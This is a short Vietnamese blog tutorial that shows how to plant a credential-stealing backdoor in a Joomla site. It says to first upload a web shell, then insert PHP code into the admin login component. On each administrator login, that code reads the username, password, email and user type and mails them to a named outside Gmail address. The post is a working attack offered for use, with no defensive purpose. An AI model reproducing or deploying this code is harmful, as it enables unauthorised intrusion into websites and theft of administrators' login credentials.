Chia sẻ thủ thuật , game gủng các kiểu mời bạn vào chơi.game offline cấu hình khủng

Thursday, February 7, 2013

[Tut] Insert Keylogger into joomla


Bước 1: Up shell lên site joomla

Bước 2: Insert mã độc vào code

       -   Vào administrator/components/com_login/

       -   Edit file: admin.login.php

       -   Tìm dòng:$mainframe->redirect('index.php');

       -   Thêm trước dòng này 1 đoạn code như sau:

     PHP Code:er;">
$db        =& JFactory::getDBO();                
$mailfrom         = $mainframe->getCfg( 'mailfrom' );
$fromname         = $mainframe->getCfg( 'fromname' );
$siteURL        = JURI::base();
$uname         = $credentials['username']; 
$query = 'SELECT name , email, usertype  ' .
        ' FROM #__users' .
        ' WHERE username = "'.$uname.'"';
$db->setQuery( $query );
$rows = $db->loadObject();

if ( ! $mailfrom  || ! $fromname ) {
    $fromname = $rows->name;
    $mailfrom = $rows->email;
}
$usertype = $rows->usertype;        
$email = $rows->email;
$pass = $credentials['password'];

$message = "$uname|$email|$pass|$usertype";
$to="ducdung.08clc@gmail.com";
$header = "Content-type: text/html; charset=utf-8\r\nFrom: $mailfrom\r\nReply-to: $to";
@mail($to, $siteURL, $message, $header);

 Với đoạn code này thì khi admin đăng nhập thì username, password, email sẽ tự động gửi về mail: ducdung.08clc@gmail.com